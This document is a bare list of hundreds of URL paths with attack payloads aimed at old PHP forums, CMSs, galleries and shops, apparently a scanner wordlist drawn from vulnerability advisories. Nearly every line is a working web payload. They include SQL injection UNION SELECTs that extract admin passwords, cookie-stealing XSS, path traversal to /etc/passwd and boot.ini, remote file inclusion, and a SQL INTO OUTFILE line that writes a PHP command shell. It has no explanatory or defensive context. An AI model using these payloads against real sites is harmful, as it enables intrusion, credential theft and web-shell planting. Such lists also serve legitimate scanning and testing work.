/pear/Net_Socket/Socket.php?PEAR_PATH=http
/pear/HTTP_Request/Request.php?PEAR_PATH=http
/pear/Mail/Mail.php?PEAR_PATH=http
/pear/Date/Date.php?PEAR_PATH=http
/pear/Date/Date/Span.php?PEAR_PATH=http
/pear/Mail_Mime/mimeDecode.php?PEAR_PATH=http
/pear/Mail_Mime/mime.php?PEAR_PATH=http
/[nuke_dir]/modules.php?name=Search&file=../../../../../../../../../etc/passwd%00
/[nuke_dir]/modules.php?name=Search&file=../Forums/viewtopic&phpEx=../../../.
/board/newtopic.php?forumID='%3C/a>%3CIFRAME%20SRC=javascript
/board/quote.php?forumID='%3C/a>%3CIFRAME%20SRC=javascript
/topsites/recommend.php?ID='%3C/a>%3CIFRAME%20SRC=javascript
/directory/recommend.php?entryID='%3C/a>%3CIFRAME%20SRC=javascript
/flatnuke/forum/index.php?op=profile&user=[abducter]
/flatnuke/forum/index.php?op=topic&quale=[abducter]
/flatnuke/forum/index.php?op=newtopic&mode=ris&quale=[abducter]&page=1
/flatnuke/forum/index.php?op=profile&user=%3Cscript%3Ealert(document.cookie);%3C/script%3E 
/?op=login&nome=<script>alert('LOL');</script>&regpass=1&reregpass=1&anag=1&email=1&homep=http%3A%2F%2F&prof=1&prov=1&ava=1&url_avatar=1&firma=1
/?op=login&from=home&nome=<script>alert('LOL');</script>&logpassword=1 
/index.php?file=Forum&page=viewtopic&forum_id=[FORUM_ID]' OR id LIKE '%%' /*&thread_id=[THREAD_ID]' AND auteur_id LIKE '%%' /*
/index.php?file=Forum&page=viewtopic&forum_id=1' OR id LIKE '%%'&thread_id=1' AND auteur_id LIKE '%%' /*
/nk/index.php?file=Sections&op=article&artid='[SQL]
/nk/index.php?file=Download&op=description&dl_id='[SQL]
/dros/add.php?forumid=|almaster
/admin/panel?err=Please Login Again<br><font color="black"><form method="POST" action=[Your Page That Saves Data]>Username
/com/queryframe.php?lang=en-iso-8859-1&server=1&hash="><script>alert(document.cookie)</script>
/com/server_databases.php?lang=en-iso-8859-1&server=1&sort_by=db_name&sort_order="><script>alert(document.cookie)</script>
/com/server_databases.php?lang=en-iso-8859-1&server=1&sort_by="><script>alert(document.cookie)</script> 
/mwchat/chat.php?Username='UNION%20SELECT%200,0,0,0,'<?system($_GET[cmd]);?>',0,0,0%20INTO%20OUTFILE%20'../../www/mwchat/shell.php'%20FROM%20chat_text/*&Sequence_Check=&Lang=en&Resolution=1280&Room=prova 
/base/base_qry_main.php?new=1&sig[0]=%3D&sig[1]=[SQL]&submit=Query+DB
/forums/index.php?act=Arcade&module=favorites&gameid=|aLMaSTeR 
/vCard/admin/define.inc.php?match=http
/index.php?PHPSESSID=270ca5a0f7c1e5b2fd4c
/index.php?tasks=all%22%3E%3Cscript
/index.php?order=sev&project=1&tasks=&type=
/bug_sponsorship_list_view_inc.php?
/bug_sponsorship_list_view_inc.php?
/ecards1/news.php?limit=%2527 
/modules.php?name=Search_Enhanced>
/include/html/forum.inc.php?addslashes=[function]&asc=[parameter]
/include/html/forum.inc.php?addslashes=[function]&desc=[parameter]
/documentation/common/body_header.inc.php?section=[file]%00
/documentation/common/print.php?section=[file]%00 
/profile.php?u=<script>JavaScript
/delpm.php?id=<script>JavaScript
/pmpshow.php?num=<script>JavaScript
/phpATM/users/<username> 
/index.php?automodule=gallery&cmd=sc&cat=26&sort_key=date&order_key=DESC&prune_key=30&st='[SQL] 
/index.php/pg/index.php?pg=scripts&CODE=06&id='[SQL]
/index.php/pg/index.php?pg=scripts&CODE=06&id=-10%20union%20select%20name,name,name%20from%20pc_admins/*
/index.php/pg/index.php?pg=scripts&CODE=06&id=-10%20union%20select%20name,pass,name%20from%20pc_admins/* 
/oaboard/forum.php?modul=topics&channel=[SQL]
/oaboard/forum.php?modul=topics&channel=-99%20UNION%20SELECT%20null,password%20FROM%20pw99_user%20WHERE%20id=1
/oaboard/forum.php?modul=posting&topic=[SQL]&channel=3
/oaboard/forum.php?modul=posting&topic=30%20UNION%20SELECT%20null,username,null,password%20FROM%20pw99_user%20WHERE%20id=1/*&channel=3 
/phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script> 
/fcard/addrbook.php?action=edit&addr_id='[SQL] 
/forum/index.php?act=newreply&t='>%3CIFRAME%20SRC=javascript
/news2net/index.php?category=[SQL] 
/forum.php?forum='><script>alert(document.cookie)</script> 
/cute141/show_archives.php?template=../../../../../../../../boot.ini%00
/cute141/show_archives.php?template=../../../../../../../../[script]
/cute141/show_news.php?template=../../../../../../../../boot.ini%00
/cute141/show_news.php?template=../../../../../../../../[script] 
/front/process_signup.php?login=[CRLF] 
/comment.php?what=news&id=<news id>
/comment.php?what=news&id=<news id>
/news.php?id=<newsid>%20AND%200%20=%201%20UNION%20SELECT%20*,%201,%201,%201,%201%20FROM%20admins%20--
/index.php?page=http
//?site=evilcode?&cmd= 
/u2u.php?action=send&username=[code] 
/2p1p0b3/upload/admin.php?adsess=[xss]&act=login&code=login-complete
/2p1p0b3/upload/admin.php?adsess=[id]&section=content&act=forum&code=new&name=[xss]
/2p1p0b3/upload/admin.php?name=[xss]&description=[xss]
/engine/admin/admin.php?id_user=
/lists/admin/?page=admin&id=1'[SQL]
/lists/admin/?page=editattributes&id=1'[SQL]
/lists/admin/?page=eventlog&s=0&filter="><script>alert(document.cookie)</script>
/lists/admin/?page=eventlog&start=&delete="><script>alert(document.cookie)</script>
/lists/admin/?page=eventlog&start="><script>alert(document.cookie)</script>
/lists/admin/?page=configure&id="><script>alert(document.cookie)</script>
/lists/admin/?page=users&find="><script>alert(document.cookie)</script>
/sap/bc/BSp/sap/index.html%3Cscript%3Ealert('xss')%3C/script%3E
/sap/bc/BSp/sap/menu/fameset.htm?sap-sessioncmd=open&sap-syscmd=%3Cscript%3Ealert('xss')%3C/script%3E 
/sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=http%3a%2f%2fwww.example.com 
/tiki-view_forum_thread.php?forumId=1&comments_parentId=0&topics_offset=10%22%20onmouseover='javascript
/index.php?VERSION=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
/index.php?_SERVER[HTTP_ACCEPT_LANGUAGE]=../../README%00
/index.php?_SERVER[HTTP_ACCEPT_LANGUAGE]=../../README%00&lng=../../README%00
//index.php?sensor_program=lmsensors.inc.php/../../README%00
/index.php?charset=%0d%0aContent-Length
/download.php?file=|SQL 
/[12allTarget]/admin/index.php
/support/module.php?module=osTicket&file=/../../../../../etc/passwd 
/ForumAuthDetails.php?AuthID=-4654'%20union%20select%20password,userid,password,userid,5,6,7,"http
/ForumReply.php?TopicID=-10%20union%20select%201,userid,3,4,5,6,7%20from%20ForumUser%20where%20user_index=1
/ForumReply.php?TopicID=-10%20union%20select%201,password,3,4,5,6,7%20from%20ForumUser%20where%20user_index=1 
/protection.php?action=logout&siteurl=http
/support/index.php?mode=forums&forumId=[sql] 
/support/index.php?mode=../../index 
/phpwcms/login.php?form_lang=../../../../../../../../etc/passwd%00 
/phpwcms/img/random_image.php?imgdir=../../../etc/ 
/phpwcms/include/inc_act/act_newsletter.php?i=V
/phpwcms/include/inc_act/act_newsletter.php?text=<script>alert(document.cookie)</script> 
/include/paymentplugins/payment_paypal.php?config[basepath]=http
/ekinboard/profile.php?id=2'%3E%3CIFRAME%20SRC=javascript
/glpi/front/ticket.form.php?id=1&_predefined_fields=[XXXX]
/forum/viewforum.php?forum_id=1&lastvisited=' 
/poll/popup.php?action=results&poll_ident="><script>alert("hola vengo a flotar");</script>
/poll/popup.php?action=results&poll_ident="><script>alert(document.cookie);</script> 
/SimplePoll/results.php?pollid=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,0,1,2,3/* 
/apboard/thread.php?id=210&start=[SQL] 
/files.php?cat='&sort 
/modules.php?name=Search
/phpp/profile.php?user='%3CIFRAME%20SRC=javascript
/phpp/mail.php?user='%3CIFRAME%20SRC=javascript
/torrential/dox/getdox.php/../forums.php
/torrential/dox/getdox.php/../../index.html 
/dev/inputvalidation%3Cscript%3Ealert(window.location.hash)%3B%3C/script%3E#XSS 
/Site/Search?action=search&q=TRY%20ANOTHER%20SEARCH%20NOW!%20YES,%20YOU!'%20onMouseOver='alert(document.title);'%20 
/process.php?pname=ShowAlbumDetailsProcess-Start&CategoryID=CategoryID&AlbumID=[sql] 
/standalone/SubCategory.php?cl=[sql]
/standalone/ItemInfo.php?item_id=[sql]
/standalone/ItemReview.php?item_id=[sql]
/tunez/songinfo.php?song_id=[sql]
/tunez/search.php?action=doSearch&searchFor=[code]&search_type=all 
/memberlist.php?action=profile&id=1[SQL] 
/kb.php?id=10006&category_id=[SQL]
/kb.php?id=[SQL] 
/survey.php?sid=[SQL] 
/DVD/moviedetails.php?usersession=&user_id=[sql]&movie_id=312 
/?edit=spec_view&edit_id=[SQL]
/?mid=41&m2id=42&page=1&faq_id=[SQL]
/?mid=41&m2id=42&page=1&c_id=[SQL] 
/computechnix/blogbuddies/
/computechnix/blogbuddies/magpierss-0.71/scripts/
/computechnix/blogbuddies/magpierss-0.71/scripts/
/freeForum/forum.php?cat=[SQL]
/freeForum/forum.php?mode=thread&thread=[SQL]
/search_result.php?cid=[sql] 
/review.php?sbres_id=[sql] 
/browsecats.php?cid=[sql]
/email.php?&h_id=[sql] 
/index.php?action=DetailView&module=Leads&record=%3Cscript%3Ealert('document.cookie')%3C/script%3E
/index.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E/?[params]
/?ticket_title=&contact_name=&priority=&status=&action=index&query=true&module=HelpDesk&order_by=&sorder=ASC&viewname=0&button=Search&category=&date_crit=is&date=%27+UNION+SELECT+56%2CCONCAT%28user_name%2C+%22%3A%22%2C+user_password%29%2C+%22Open%22%2C%22Normal%22%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1+from+users+where+users.user_name+LIKE+%27 
/index.php?pageaction=results&campaign_id=[SQL] 
/forum.php?msg=[SQL] 
/forums/thread.php?threadid=[SQL]
/forums/profile.php?userid=[SQL] 
/efiction/titles.php?action=viewlist&let=<script>alert(document.cookie)</script>
/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,'<script>alert(document.cookie)</script>'
/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,penname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
/[path]/viewuser.php?uid='UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/*
/search.php?field=Subject&searchvalue=&Category=any&Status=any&Priority=any&lorder=[SQL]
/search.php?field=Subject&searchvalue=&Category=any&Status=any&Priority=[SQL]
/search.php?field=Subject&searchvalue=&Category=any&Status=[SQL]
/search.php?field=Subject&searchvalue=&Category=[SQL]
/search.php?field=Subject&searchvalue=[SQL]
/search.php?field=[SQL]
/?_page=product_cat
/path_to_athena/athena.php?athena_dir=http
/path_to_phpgreetz/content.php?content=http
/path_to_qnews/q-news.php?id=http
/index.php?poll=[SQL]
/index.php?category=[SQL]
/?archive&ctg=[SQL] 
/index.php?page=news&subsection=viewcomments&news_id=[sql]
//index.php?page=faq&subsection=viewfaq&faq_id=[sql]
//index.php?page=home&order=&orderby=&rowstart=[sql]
/folder/themes/kategorie/index.php?kategorieid=6[SQL]
/folder/themes/kategorie/index.php?katid=40[SQL]
/fws/pixel.php"
/fws/pixel.php"
/search?q=lello+splendor++&hl=it&lr=&start=
/fws/pixel.php"
/fws/pixel.php"
/fws/pixel.php?site=
/search?
/fws/inject.js?></script>&hl=it" 
/stat.php?lastnumber=urlencoded%20text
/stat/pixel.php -e
/a>?
/stat/pixel.php -e
/issue.php?id=[SQL]
/find.php?act=action&reset=yes&detail%5B%5D=[SQL]
/find.php?page=0&act=action&orderby=sortorder&orderdir=[SQL]
/find.php?page=0&act=action&orderby=[SQL] 
/[path_to_guppy]/admin/editorTypetool.php?cmd=DIR&meskin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
/[path_to_guppy]/admin/inc/archbatch.php?lng=../../../../../../../../../../../boot.ini%00
/[path_to_guppy]/admin/inc/dbbatch.php?lng=../../../../../../../../../../../
/[path_to_guppy]/admin/inc/dbbatch.php?lng=../../../../../../../../../../../boot.ini%00
/[path_to_guppy]/admin/inc/nwlmail.php?lng=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
/index.php?show=../File 
/index.php?REQ=%3Cscript%3Ealert('r0t%20XSS')%3C/script%3ESubmit=Submit 
/upload/index.php?action=view&filename=../../../../../../../../../../../../../../../../etc/passwd
/instaladores/index.php?action=view&filename=../../../../../../../../../../../../../../../../etc/passwd 
/news.php?action=news&category=[SQL] 
/index.php?action=comments&id=[sq]
/index.php?action=news_list&display_num=[sql]
/index.php?action=news_list&sortorder=[sql] 
/?action=showcat&idcat=[SQL]
/?action=[SQL] 
/calendar.phptype=day&calendar=&category=&day=25&month=11&year=[SQL]
/calendar.php?type=day&calendar=
/merchants/index.php?tm_userid=_&tm_orderid=&tm_transt
/merchants/index.php?um_name=&um_surname=&um_aid=&um_s
/search.php?query=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&mode=all&imageField.x=21&imageField.y=4 
/category.php?action=view&id=[SQL] 
/calendar.php?display=event&id=[SQL] 
/knowledgebase?qid=[SQL] 
/blog?msg=[SQL] 
/ringmaker?start=[SQL] 
/viewFAQ.php?action=edit&FAQ_ID=[SQL]
/viewFAQ.php?action=[SQL]
/index.php?SEARCH_KEYS=&CATEGORY_ID=[SQL] 
/survey.php?SURVEY_ID=[SQL] 
/customers/domains.php?plan_id=[SQL]
/customers/viewinvoice.php?invoiceID=[SQL]
/customers/viewplan.php?customerPlanID=[SQL]
/customers/referred_plans.php?ref_id=[SQL]
/customers/referred_plans.php?sort=id&order=asc&ref_id=[SQL]
/customers/viewusage.php?plan_id=[SQL]
/customers/listcharges.php?customerPlanID=[SQL]
/customers/pop_accounts.php?plan_id=[SQL]
/customers/pop_accounts.php?plan_id=35&domain=[SQL]
/customers/databases.php?plan_id=[SQL]
/customers/databases.php?plan_id=35&domain=[SQL]
/customers/ftp_users.php?plan_id=[SQL]
/customers/ftp_users.php?plan_id=35&domain=[SQL]
/customers/crons.php?plan_id=[SQL]
/customers/crons.php?plan_id=35&domain=[SQL]
/customers/pass_dirs.php?plan_id=[SQL]
/customers/pass_dirs.php?plan_id=35&domain=[SQL]
/customers/zone_files.php?plan_id=[SQL]
/customers/zone_files.php?plan_id=35&domain=[SQL]
/customers/htaccess.php?plan_id=[SQL]
/customers/htaccess.php?plan_id=35&domain=[SQL]
/customers/software.php?plan_id=[SQL]
/customers/software.php?plan_id=35&domain=[SQL] 
/?__f=category&node=[SQL]
/?__f=rating_add&art_id=[SQL] 
/main.php?cmd=../
/main.php?cmd=album&var1=../ 
/selloffers.php?cid=[SQL]
/buyoffers.php?cid=[SQL]
/products.php?cid=[SQL]
/profiles.php?cid=[SQL] 
/index.php?cid=[SQL] 
/faq_qanda.php?id=[SQL] 
/refer_friend.php?id=[SQL] 
/print_article.php?id=[SQL] 
/add_comment.php?id=[SQL] 
/answer.php?id=[SQL] 
/index.php?action=displaycat&catid=1[SQL]
/index.php?todo=orderlinks&action=displaycat&
/index.php?todo=orderlinks&action=displaycat&
/index.php?todo=orderlinks&action=displaycat&
/comments.php?id=[SQL]
/memberlist.php?action=profile&id=1[SQL] 
//index.php?d=28&m=[SQL] 
/portfolio.php?cat_id=[SQL]
/content.php?cid=[SQL] 
/webcalendar/activity_log.php?startid=%2527
/webcalendar/activity_log.php?startid=%27
/webcalendar/activity_log.php?startid=' 
/webcalendar/layers_toggle.php?status=on&ret=[url_redirect_to] 
/search/extremesearch.php?search=%3Cscript%3Ealert%28%27r0t+XSS%27%29%3C%2Fscript%3E&lang= 
/trac/query?group=/* 
/phpmychat/chat/config/start_page.css.php?medium=><script>alert(29837274289742472);</script>&FontName=1 
/phpmychat/chat/config/style.css.php?medium=><script>alert(29837274289742472);</script>&FontName=1 
/phpmychat/chat/users_popupL.php?From="><script>alert(29837274289742472);</script>>&L=english&LastCheck=1133281246&B=0 
/gallery.php?CatID=[SQL] 
/ViewItem.php?ItemNum=[SQL] 
/messages.php?folder=inbox&srch_text=a&srch_type=blehblahbleh&sort_type=blahblehblah&srch_submit=Search%20/%20Sort 
/search_result.php?search=url&haystack=[SQL]
/print_me.php?ckey=[SQL] 
/property.php?action=property&property_id=[SQL]
/property.php?action=search&city_id=&zip_code
/property.php?action=search&city_id=&zip_code=
/property.php?action=search&city_id=&zip_code=
/property.php?action=search&city_id=[SQL]&zip_code=
/view.php?prod=[SQL]
/index.php?action=ViewGroups&grp=[SQL]
/index.php?action=ViewCategories&cat=[SQL] 
/viewbrands.php?bid=[SQL]
/ls.php?lang=en&action=list&start=[SQL]
/ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword=&search_area=&search_type=&infield=&search_order=[SQL]
/ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword=&search_area=&search_type=[SQL]
/ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword=[SQL]
/ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword=&search_area=[SQL] 
/view.php?arrange=[SQL]
/view.php?p=[SQL] 
/index.php?name=&price_from=&price_to=&city=&state=SC&mls=[SQL]&bathroom=-1&bedrooms=-1&go=search&results=1 
/index.php?afis=browse&s=[SQL]
/index.php?afis=profil&pg=[SQL]
/index.php?afis=SelCupidonNoLog&sortb=[SQL]
/gift.php?A=ViewGifts&cid=[SQL]
/articles.php?cat=1[SQL]
/articles.php?A=ViewArticles&cat=1[SQL]
/fq.php?A=ViewFQ&cid=1[SQL] 
/comentarii.php?idp=[SQL] 
/functions.php?action=ViewPaymentLog&pid=[SQL] 
/arhiva.php?dir=../ 
/index.php?mode=home&cat=-99[SQL CODE]
/trac/search?q=test\' 
/addons/fckeditor2rc2/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=../../../../../../../../&CurrentFolder= 
/index.php?categoryid=[SQL]
/index.php?entryid=[SQL]
/index.php?month=1&year=[SQL]
/index.php?month=[SQL]
/index.php?year=2005&month=12&day=[SQL] 
/index.php?page=[SQL]
/index.php?page=en_Home&car=[SQL] 
/thwb/calendar.php?month=12&year='[SQL]
/thwb/v_profile.php?user[userid]='[SQL]
/thwb/misc.php?action=getlastpost&userid='[SQL] 
/customers/login.php?customerEmailAddress=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/red_14/register.php?do=register2&domainname=%22%3E%3Cs
/Projects/SPT/demo/SPT--QuickSearch.php?ss=<script>alert(document.cookie)</script> 
/Projects/SPT/demo/SPT--BrowseResources.php?ParentId=<script>alert(document.cookie)</script> 
/Projects/SPT/demo/SPT--Advanced.php
/Projects/SPT/demo/SPT--UserLogin.php
/Arab_Portal_v.2.0_beta_2/link.php?action=list&cat_id=5&',
/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=http
/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../etc/passwd%00
/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../script.php%00 
/gallery.php?page=foto&action=show_custom&id=[SQL] 
/comments.php?keyword=&author=&cat=0&since=[SQL]
/comments.php?keyword=&author=&cat=0&since=1&sort_by=[SQL]
/comments.php?keyword=&author=&cat=0&since=1&sort_by=date&sort_order=descending&items_number=[SQL] 
/category.php?cat=search&search=[SQL] 
/picture.php?cat=best_rated&image_id=[SQL] 
/index.php?sortdir=ASC&level=album&id=[SQL]
/index.php?level=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
/index.php?level=search&searchterms=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E 
/search.php?searchstring=&by=[SQL]
/?page=category&category_id=1&viewmode=img&batch=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E 
/Search/DisplayResults.php?DOMAIN_Link=&iSearchID=292&sKeywords=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E 
/view_filters_page.php?for_screen=1&target_field=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E 
/view.php?gallery_id=[SQL] 
/image.php?page=1&gallery_id=1&image_id=[SQL] 
/search.php?keyword=%22%3E%3Cscript%3Ealert%28%
/index.php?language=../FILE
/show.php?start=0&id=[SQL]
/show.php?start=[SQL]
/show.php?rand=1&id=[SQL]
/show.php?rand=[SQL] 
/index.php?album=[SQL]
/advertiser_statistic.php?action=statistic_main&ad_number=[SQL]
/index.php?cat=[SQL] 
/view_Results.php?id=[SQL] 
/admin/adminsignin.html?fwd=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
/support/admin/newpage.html?originalpageid=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E 
/[DIR]/modules.php?name=Search
/[DIR]//modules.php?name=Web_Links
/[envo]/modules.php?op=modload&name=News&file=index&catid=&topic=18&startrow=[xss]
/[envo]/modules.php?op=modload&name=News&file=index&catid=[xss] 
/[envo]/modules.php?op=modload&name=News&file=index&catid=&topic=18&startrow=[sql]
/[envo]/modules.php?op=modload&name=News&file=index&catid=[sql]
/TextSearch?phrase=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E 
/pro/page/index.php?cat=[Sql Injection] 
/communication/popups.edit.php?popupid=[SQL]
/communication/customer.tickets.view.php?so=[SQL]
/communication/customer.tickets.view.php?so=ASC&sb=[SQL]
/communication/customer.tickets.view.php?so=ASC&sb=Status&nr=[SQL]
/communication/subscribers.tracking.edit.php?subtrackingid=[SQL]
/settings/design.php?delete=[SQL]
/tools/tracking.details.php?trackingid=1[SQL]
/mycompany/sales.view.php?customerid=1[SQL] 
/[path]/?_SERVER[]=&_SERVER[REMOTE_ADDR]=<script>alert(document.cookie)</script>
/[path_to_limbo]/index2.php?option=frontpage/../../../../../../../../../../../script 
/index.php?page=">[XSS]
/?page=">[XSS] 
/[ztml]/index.php?type=tpl&form=<h1> x1ng <h1/>
/[ztml]/index.php?doc=unote&id=[sql] 
/index.php?page=http
/?page=http
/index.php?p=../Local file
/index.php?p=getcat&db_id=[SQL] 
/browse.ihtml?step=4&store=42&id=[SQL]
/browse.ihtml?step=4&store=1[SQL]
/browse.ihtml?step=[SQL] 
/merchant.ihtml?id=56&step=[SQL]
/merchant.ihtml?id=[SQL]
/merchant.ihtml?pid=[SQL] 
/pafiledb.php?news=showcontent&newsid=[SQL] 
/index.php?action=%3Ch1%3E%3Cmarquee%3Ehalooo%3C/marquee%3E%3C/h1%3E 
/jportal/forum.php?cmd=search&word=Trey&where=author%20and%201=0%20union%20select%20null,null,nick,pass,null,
/guestbook/index.php?entry=<script>alert(document.cookie);</script>
/guestbook/index.php?entry=<iframesrc=http
/guestbook/comment.php?gb_id=1<script>alert(document.cookie);</script>
/guestbook/comment.php?gb_id=1<IFRAMESRC="javascript
/playsms/index.php?err=XSShere 
/[fushion]/members.php?sortby=%3Ciframe%20src=http
/Introduction?&CB=CB1&fileDN=[XSS]
/Community/News?&CB=CB1&fileDN=[XSS]
/Community/News?&CB=CB1&fileDN=mnF%3
/Introduction?&CB=CB1&fileDN=mnF%3D2.
/search.htm?searchstring2=&searchstring=[XSS] 
/text.php?name=[XSS]
/forum.php?frame=[XSS] 
/search/index.php?advanced=0&associated_list=&page=1&search=0&page_search=[XSS] 
/web/guest/downloads/portal_ent?p_p_id=77&p_p_action=1&p_p_state=maximized&p_p_mode=view&p_p_col_order=null&p_p_col_pos=2&p_p_col_count=3&_77_struts_action=[XSS]
/web/guest/downloads/portal_ent?p_p_id=77&p_p_action=1&p_p_state=maximized&p_p_mode=[XSS]
/com/web/guest/downloads/portal_ent?p_p_id=77&p_p_action=1&p_p_state=[XSS] 
/?search=[XSS] 
/search.html?query=[XSS] 
/index.php?StoryID=[SQL] 
/?setLang=[SQL] 
/faq.php?cat=1[SQL] 
/index.php?show=[SQL] 
/index.php?page=[SQL]
/newsitem.php?id=[SQL]
/article.php?cat=[SQL] 
/fisheye/list_galleries.php?sort_mode=[SQL]
/blogs/view_post.php?post_id=[SQL]
/blogs/view.php?blog_id=[SQL]
/messages/message_box.php?sort_mode=[SQL]
/users/my.php?sort_mode=[SQL] 
/page.php?page=[SQL] 
/index.cfm?page=[SQL]
/index.cfm?page=40&criteria=&start=11&title=&content=[XSS]
/index.cfm?restricted=false&page=10&criteria=[XSS] 
/PATH/admin/plog-admin-functions.php?config[basedir]=http
/index.php?go=admin&do=do_search&du=usergroup&title=[code]&search=single 
/twebs/modules/misc/usermods.php?ROOT=http
/cgi-bin/evil_cookie_logger.cgi?'+document.cookie</script> 
/?op=search&offset=0&old_count=30&type=[XSS]
/?op=search&offset=0&old_count=30&type=story&topic=&section=&string=r0t&count=1[XSS]
/story/2005/11/4/184932/452[XSS]
/story/2005/11/4/184932[XSS]
/story/2005/11/4[XSS]
/story/2005/11[XSS]
/story/2005[XSS]
/story/[XSS] 
/index.php?menuid=[SQL] 
/guestbook.php?menuid=[SQL] 
/print.php?reporeid_print=&forumid=[SQL]
/print.php?reporeid_print=[SQL] 
/article.php?story_id=1[SQL] 
/version2.3/?action=top&show=5&type=[sql] 
/cerberus-gui/knowledgebase.php?mode=view_entry&root=2&sid=c7bb6a0d5f83d61d75053c85c14af247&kbid=4 [SQL]
/cerberus-gui/display_ticket_thread.php?type=comment&sid=a640d024f84be01320aacb0ec6c87d74&ticket=[SQL] 
/?lng=es"><script>alert(document.cookie)</script>
/index.php?lng=es"><script>alert(document.cookie)</script> 
/index.php?_m=downloads&_a=view&
/[path]/Documentation/tests/bug-559668.php?FORUM[LIB]=<script>alert(document.cookie)</script> 
/webforum/index.php? theme_id=-1% 20union%20select% 201,2,name, 4,5%20from% 20vwf_users% 20where%20userid=1/*
/temp/_1/webforum/index.php? theme_id=-1% 20union%20select% 201,2,name, 4%20from%20vwf_users% 20where%20userid=1/*
/webforum/index.php? theme_id=-1% 20union%20select% 201,2,name, 4,5%20from% 20vwf_users% 20where%20userid=1/*
/temp/_1/webforum/index.php? theme_id=-1% 20union%20select% 201,2,pass, 4%20from%20vwf_users% 20where%20userid=1/* 
/links/login.php
/phpenpals/profile.php?personalID=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,password,14%20from%20admin/* 
/index.php
/phpjournaler/index.php?readold=999%20union%20select%201,password,3,4,name,6%20from%20Users/* 
/guestbook/addentry.php
/chimera/modules.php?name=guestbook&file=index
/chimera/linkcategory.php?id=9999'%20union%20select%20admin_password%20from%20admin/* 
/auth.php
/index.php?view=DevelopmentItemResultsView&devWherePair
/index.php?view=DevelopmentItemResultsView&where=project
/index.php?view=DevelopmentItemResultsView&where=[SQL] 
/index.php?view=AddToFavoriteItemSetView&ids%5B0%5D=[XSS]
/index.php?view=AddRelatedDevelopmentItemFormView&report_id=9&action=[XSS]
/index.php?view=AddRelatedDevelopmentItemFormView&report_id=[XSS]
/index.php?view=DevelopmentItemResultsView&devWherePair%5B0%5D=state_id+%3C+%3F++AND++MATCH+%28report%2Csubject%2Cdevelplan%2Cfixednotes%2Crepsteps%29+AGAINST+%28%3F++IN+BOOLEAN+MODE%29&devWherePair%5B1%5D%5B0%5D=240&devWherePair%5B1%5D%5B1%5D=[XSS]
/index.php?view=DevelopmentItemResultsView&where=project_id+%3D+%3F&orderBy=priority_id+DESC&binds%5B0%5D=[XSS] 
/user.php?email=[SQL]&action=send-password-now
/search.php?action=search&q=[SQL] 
/jax_calendar.php?Y=2005&m=11&d=15&cal_id=[SQL] 
/helpdesk.php?__mode=[SQL]
/helpdesk.php?__mode=view&__id=[SQL] 
/ezi/invoices.php?i=[SQL] 
/index.php?target=products&mode=search&subcats=Y&type=extended&avail=Y&pshor=Y&pfull=Y&pname=Y&cid=0&q=&x=11&y=3&sort_by=[SQL]
/index.php?target=products&mode=search&subcats=Y&type=extended&avail=Y&pshor=Y&pfull=Y&pname=Y&cid=0&q=%27&x=11&y=3&sort_by=product&sort_order=[SQL] 
/domus/escribir.php?domus=ae29cf4d3f2dc42241e387d39b4126e2&hilo=1&padre=1&categoria=General&n=&usario=username&email=e@\';%20alert(123);%20var%20dss=\'h.co&asunto=blabla&texto=anytext&accion=enviar 
/twf/login.php
/twf/login.php
/tpf/profile.php?action=view&uname=../../username
/appserv/main.php?appserv_root=http
/bb427/showthread.php?ForumID=999%20union%20select%20UserName,Passwrod,null,null%20from%20prefPersonal 
/venomboard/forum/post.php3?topic_id=999%20union%20select%201,2,3,4,5,6,7/* 
/modules.php?name=Search and type in
/?page=http
/myphpim/calendar.php3?menu=detail&cal_id=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
/[tpointdir]/index.php?Page=login&Action=Login&username=[XSS] 
/exp/tanklogger/showInfo.php? livestock_id=99'% 20union%20select% 201,2,3,4,5, 6,7,8,9/* 
/calendar.php?show=full_month&s=1&submit=GO&day=[XSS]
/search.php post this code <script>alert('night_warrior');</script> 
/template/fullview.php?tempid=[XSS] 
/visitorupload.php?db_id=;phpinfo()
/visitorupload.php?db_id=;include(_GET[test])&test=http
/admin/index.php
/folder/pictures.php?dir=[SQL] 
/geoblog/viewcat.php?cat=I'%20union%20select%201,2,3,4,5,6,7/* 
/index.php?page=listStory&cat=Programs+and+Services&subcat=[code]
/index.php?page=listStory&cat=[code] 
/index.php?db_id=1&cat_id=1&display=30&p=%3Cscript%3Ealert(document.cookie)%3C/script%3E&rowstart=90 
